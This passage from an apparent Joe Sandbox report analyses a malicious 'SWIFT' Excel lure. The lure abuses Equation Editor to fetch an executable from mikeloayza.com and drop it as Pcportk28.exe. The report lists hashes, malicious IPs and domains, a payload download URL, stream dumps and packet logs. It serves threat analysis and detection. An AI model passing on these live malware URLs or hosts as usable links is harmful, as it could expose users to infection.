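The rule keys on the path and parameter names rather than on hostnames, which is the right unit here: the report already shows six hostnames served by the same template, and the constant Lvkth value makes the match specific to this campaign rather than to any site with a two-parameter GET.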

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://investor.msn.com | explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://treyresearch.net | explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp | false | | high
http://java.sun.com | explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp | false | | high
http://investor.msn.com/ | explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://www.piriform.com/ccleaner | explorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.499989252.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551993194.0000000004513000.00000004.00000001.sdmp | false | | high
http://computername/printers/printername/.printer | explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
http://www.%s.comPA | explorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://www.autoitscript.com/autoit3 | explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp | false | | high
https://support.mozilla.org | explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp | false | | high
http://servername/isapibackend.dll | explorer.exe, 00000006.00000000.551082192.0000000003E50000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

Every entry in this table comes from explorer.exe memory dumps (process 6), and they are the format strings, help links and shell-extension references a long-running explorer.exe carries on any Windows 7 image, not strings the implant brought with it. None is an indicator for this sample; the indicators are the contacted URLs above.

                                              Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
162.0.209.73 | bitcointradel.com | Canada | 35893 | ACPCA | true
216.239.34.21 | www.fisioletsgo.com | United States | 15169 | GOOGLEUS | false
118.67.131.217 | www.luckyfandom.com | Korea Republic of | 24395 | CLEAR-AS-APClearNetworksPtyLtdAU | true
34.102.136.180 | executive-air.net | United States | 15169 | GOOGLEUS | false
131.153.37.4 | mikeloayza.com | United States | 20454 | SSASN2US | true

                                              General Information

                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                              Analysis ID:553293
                                              Start date:14.01.2022
                                              Start time:16:03:14
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 11m 7s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:SWIFT - Copy - Copy.xlsx
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:10
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winXLSX@9/6@6/5
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HDC Information:
                                              • Successful, ratio: 25.8% (good quality ratio 24.8%)
                                              • Quality average: 71.7%
                                              • Quality standard deviation: 28.6%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .xlsx
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Active ActiveX Object
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                              • TCP Packets have been reduced to 100
                                              • Not all processes were analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                                              Simulations

                                              Behavior and APIs

                                              Time     | Type            | Description
                                              16:03:46 | API Interceptor | 106x Sleep call for process: EQNEDT32.EXE modified
                                              16:03:51 | API Interceptor | 74x Sleep call for process: Pcportk28.exe modified
                                              16:04:12 | API Interceptor | 215x Sleep call for process: wininit.exe modified
                                              16:04:57 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASN

                                              No context

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:downloaded
                                              Size (bytes):601600
                                              Entropy (8bit):7.208019029819951
                                              Encrypted:false
                                              SSDEEP:12288:VK777777777777N7sPip0jsXSEf2V3SVP5AmeTZVYclQ3eRrYtf:VK777777777777lsKp0A3MC7CxS3YrY
                                              MD5:25EE51200E7D86AB2C531748E5C01C72
                                              SHA1:6BE3C75759C1F9428299B82394DEAFAD3B165D57
                                              SHA-256:33BB2954B5EFD072D71B4D7BF79EB609E4143A01023C15F8239F3A93561052E0
                                              SHA-512:B90110F86236C04D92405B7931606FFB82533863F7A141115A545C5C1949115298F4D1296C950D176CF33B1EB0A1489D76548A8E186168ADA03E1B25A420EA4F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              IE Cache URL:https://mikeloayza.com/E9/i4L.exe
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.a.....................>........... ... ....@.. ....................................@.................................p...K.... ...:...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....:... ...<..................@..@.reloc.......`.......,..............@..B........................H.......,f...-......E.......6y............................................{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*....0.......... ........8....8....r...p.(......8....r;..p.(...... .....:....&8....r...p.(...... .....:....&.(.......(....9.... ........8........ ........8....r...p.(.......(....:....~....8.....(.......(.......(.....(.......(....:....~....8.....(.......(.......(.....(.......(....:....~....8.....(.......(.......
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\i4L[1].htm
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:HTML document, ASCII text
                                              Category:dropped
                                              Size (bytes):241
                                              Entropy (8bit):5.144431573763422
                                              Encrypted:false
                                              SSDEEP:6:pn0+Dy9xwol6hEr6VX16hu9nPfV8Ni+KqD:J0+ox0RJWWP98zT
                                              MD5:5C1BF763B986387E9E117DABF2FB37BC
                                              SHA1:29F8142D2580878381BBB0DFD7D333C924C24093
                                              SHA-256:9A0E4DD90EF8EFA0B54BBF9C1A810F227A9C4BA08AD315470A2BC519023F5DB0
                                              SHA-512:48397E5342820C32752A23EFC6D6776784ADA4950C591A21373B06DABA50467B489761C6018660D518B448A6B6F7121382DA33F916AC06905C1005952361B176
                                              Malicious:false
                                              Reputation:low
                                              Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://mikeloayza.com/E9/i4L.exe">here</a>.</p>.</body></html>.
                                              C:\Users\user\AppData\Local\Temp\7916.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):1536
                                              Entropy (8bit):1.1464700112623651
                                              Encrypted:false
                                              SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                              MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                              SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                              SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                              SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\~DF01B9A0A507F75E4B.TMP
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1708032
                                              Entropy (8bit):7.361455956824453
                                              Encrypted:false
                                              SSDEEP:49152:+QKkr5BOPqqENGfJbDan2Kmg6RsOEX0q:+Q7sNEYNDw
                                              MD5:1A8EF3975ACA5EEFAE5D35CFA752A22B
                                              SHA1:D4400575CB198B054E2FEED616010C57AD07525F
                                              SHA-256:17026E92707F76D3A8BE214E3EEA223A2A7630E162923B159DF6193837E0F91F
                                              SHA-512:B14A70C0BA99CDA8231C3419AC1B5F0EDB1AD3C451BE2B9E449E5FBA5C771FE0E24604F61DBA8D107088DFAE67C3A213B5017CE59AC2F1EBEA452E9B0FEFAB45
                                              Malicious:false
                                              Reputation:low
                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\Desktop\~$SWIFT - Copy - Copy.xlsx
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):165
                                              Entropy (8bit):1.4377382811115937
                                              Encrypted:false
                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              C:\Users\Public\Pcportk28.exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):601600
                                              Entropy (8bit):7.208019029819951
                                              Encrypted:false
                                              SSDEEP:12288:VK777777777777N7sPip0jsXSEf2V3SVP5AmeTZVYclQ3eRrYtf:VK777777777777lsKp0A3MC7CxS3YrY
                                              MD5:25EE51200E7D86AB2C531748E5C01C72
                                              SHA1:6BE3C75759C1F9428299B82394DEAFAD3B165D57
                                              SHA-256:33BB2954B5EFD072D71B4D7BF79EB609E4143A01023C15F8239F3A93561052E0
                                              SHA-512:B90110F86236C04D92405B7931606FFB82533863F7A141115A545C5C1949115298F4D1296C950D176CF33B1EB0A1489D76548A8E186168ADA03E1B25A420EA4F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.a.....................>........... ... ....@.. ....................................@.................................p...K.... ...:...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....:... ...<..................@..@.reloc.......`.......,..............@..B........................H.......,f...-......E.......6y............................................{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*....0.......... ........8....8....r...p.(......8....r;..p.(...... .....:....&8....r...p.(...... .....:....&.(.......(....9.... ........8........ ........8....r...p.(.......(....:....~....8.....(.......(.......(.....(.......(....:....~....8.....(.......(.......(.....(.......(....:....~....8.....(.......(.......

                                              Static File Info

                                              General

                                              File type:Microsoft Excel 2007+
                                              Entropy (8bit):7.998825501408383
                                              TrID:
                                              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                              • ZIP compressed archive (8000/1) 16.67%
                                              File name:SWIFT - Copy - Copy.xlsx
                                              File size:1400294
                                              MD5:338cbe8a882d7c941afe2cf895055bd5
                                              SHA1:f081a9d12054b2e1a59d3eae4fa65059db634268
                                              SHA256:097ce13d935a168aa627794fce83fb57b3ad39989c46b574acb13820edbafe4a
                                              SHA512:544deb29896756b4391cd46cd0e76154c837530a5e2512ef03c6dc90145f98d43b6c7469625ad082bfc0929940177808e62d3deafd6412a626f1c0301adc32d6
                                              SSDEEP:24576:Ggp3MkrfAEnTlQdzPqdACoEh1GxdIGbHXMFxPrt/Qe6KxwfqI+WSKbjqRJc3satR:/Mkr1ZsPqkEDGbfbH4L2sESKbCc3Ptek
                                              File Content Preview:PK...........T>...............[Content_Types].xmlUT...C..aC..aC..a.U.N.0..#.....q........7.......m<...=...............3.xx.h\1..6.J...(..`..T....w".$..r.C%....|.o......=V.&.gR...QX.....Cj..k....TM@....R.O..G.C....@...{..V5.#.N....9(.O..+`.....Y.....7....x

                                              File Icon

                                              Icon Hash:e4e2aa8aa4b4bcb4

                                              Static OLE Info

                                              General

                                              Document Type:OpenXML
                                              Number of OLE Files:1

                                              OLE File "/opt/package/joesandbox/database/analysis/553293/sample/SWIFT - Copy - Copy.xlsx"

                                              Indicators

                                              Has Summary Info:False
                                              Application Name:unknown
                                              Encrypted Document:False
                                              Contains Word Document Stream:
                                              Contains Workbook/Book Stream:
                                              Contains PowerPoint Document Stream:
                                              Contains Visio Document Stream:
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:False

                                              Summary

                                              Author:
                                              Last Saved By:
                                              Create Time:2006-09-16T00:00:00Z
                                              Last Saved Time:2021-04-20T13:49:29Z
                                              Creating Application:Microsoft Excel
                                              Security:0

                                              Document Summary

                                              Thumbnail Scaling Desired:false
                                              Company:
                                              Contains Dirty Links:false
                                              Shared Document:false
                                              Changed Hyperlinks:false
                                              Application Version:12.0000

                                              Streams

                                              Stream Path: \x1oLe10nAtiVE, File Type: data, Stream Size: 1687673
                                              General
                                              Stream Path:\x1oLe10nAtiVE
                                              File Type:data
                                              Stream Size:1687673
                                              Entropy:7.35599527556
                                              Base64 Encoded:True
                                              Data ASCII:. ) ; . . 5 & . { . . . . . . . . . c % ~ . M . . 8 . . . . . . 5 . . . . 0 . . 2 Q . . . . . # . . . | . . . . . . . . E . u . V . / B ~ . . . . e S . z . . Q M p . & 5 . . . . . x . w v z . . W w . . . s . n . . 7 _ . . . . . . . < . . . / . . . . . . . k . K $ . B A h N . g . 4 . < s . . A # . . F A . . . . . . + . % . . . . ! . % . . J . . ! . . . P . . . T . B . v J d . . . . . V J g v . a . . . . . g . \\ t i ` . . K ) / . . v . . 4 . . . . . . ; . . = . . . . . . . 4 % . i d . w . . N c e . . . " .
                                              Data Raw:d0 29 3b 06 02 35 26 e3 7b ee 01 08 f7 a0 b8 bd bf e7 63 25 7e bd 4d 8c 8b 38 8b 0f ba b3 e6 15 35 81 c2 fd 80 30 cb 8b 32 51 ff d6 05 8d c2 23 01 05 02 7c e7 fe ff e0 e4 82 dd 0c 45 00 75 cc 56 d8 2f 42 7e a4 01 c7 20 b6 65 53 c3 7a f4 cc 51 4d 70 0d 26 35 fe b8 06 9c a4 78 89 77 76 7a e1 2e 57 77 06 a4 03 73 ff 6e bd 1a 37 5f 1b d5 a6 7f fe 8c ef 3c d1 a2 dc 2f b0 9d 9e f4 e8 ad
                                              Stream Path: HDsuMKhCbfmuqyxLqNuKc, File Type: empty, Stream Size: 0
                                              General
                                              Stream Path:HDsuMKhCbfmuqyxLqNuKc
                                              File Type:empty
                                              Stream Size:0
                                              Entropy:0.0
                                              Base64 Encoded:False
                                              Data ASCII:
                                              Data Raw:

                                              Network Behavior

                                              Snort IDS Alerts

                                              Timestamp                | Protocol | SID  | Message                           | Source Port | Dest Port | Source IP      | Dest IP
                                              01/14/22-16:06:04.365376 | TCP      | 1201 | ATTACK-RESPONSES 403 Forbidden    | 80          | 49172     | 34.102.136.180 | 192.168.2.22

                                              Network Port Distribution

                                              TCP Packets

                                              Timestamp                          | Source Port | Dest Port | Source IP    | Dest IP
                                              Jan 14, 2022 16:04:33.911838055 CET | 49167 | 80    | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:34.100852013 CET | 80    | 49167 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:34.100967884 CET | 49167 | 80    | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:34.101399899 CET | 49167 | 80    | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:34.290345907 CET | 80    | 49167 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:34.291004896 CET | 80    | 49167 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:34.291089058 CET | 49167 | 80    | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:34.481738091 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:34.481784105 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:34.481870890 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:34.489912987 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:34.489944935 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:34.890429974 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:34.890625954 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:34.906006098 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:34.906070948 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:34.906405926 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:34.906527042 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.145149946 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.185965061 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.331522942 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.331724882 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.515368938 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.515399933 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.515492916 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.515561104 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.515573978 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.515604973 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.515619040 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.515795946 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.697778940 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.698010921 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.698127985 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.698180914 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.698206902 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.698276043 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.698321104 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.698429108 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.698492050 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.698589087 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.698719978 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.880594015 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.880655050 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.880733013 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.880759001 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.880779982 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.880796909 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.880805016 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.880819082 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.880861044 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.880877972 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.880930901 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.880981922 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.881046057 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.881048918 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.881058931 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:35.881093979 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:35.881150961 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.063811064 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.063884020 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.064023972 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.064043999 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.064068079 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.064124107 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.064136028 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.064156055 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.064169884 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.064194918 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.064238071 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.064457893 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.064536095 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.064630985 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.064646006 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.064656973 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.064711094 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.065083027 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.065138102 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.065174103 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.065182924 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.065238953 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.065263987 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.065325022 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.101618052 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.101684093 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.101718903 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.101737022 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.101748943 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.101754904 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.101772070 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.101780891 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.248202085 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.248265028 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.248383999 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.248436928 CET | 49168 | 443   | 192.168.2.22 | 131.153.37.4
                                              Jan 14, 2022 16:04:36.248467922 CET | 443   | 49168 | 131.153.37.4 | 192.168.2.22
                                              Jan 14, 2022 16:04:36.248492002 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.248526096 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.248541117 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.248564959 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.248634100 CET49168443192.168.2.22131.153.37.4

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
